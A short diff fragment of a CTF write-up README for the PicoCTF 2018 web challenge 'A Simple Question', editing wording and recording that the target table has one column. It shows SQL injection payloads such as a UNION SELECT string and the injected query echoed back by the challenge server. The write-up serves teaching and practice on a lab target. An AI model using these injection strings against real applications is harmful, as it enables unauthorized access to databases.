Sudoite/ctf-writeups/PicoCTF2018/web/ASimpleQuestion/README.md

 `print(submit_query("42' OR '1'='1' UNION SELECT NULL'"))`

-results in `True`.
+resulted in `True`.
+So there is just one column in the `answers` table.

-Next I get the number of rows in the table:
+Next I got the number of rows in the `answers` table:
 ```
 <pre>SQL query: SELECT * FROM answers WHERE answer='42' OR '1'='1' LIMIT 0,1 --'
 </pre><h1>You are so close.</h1>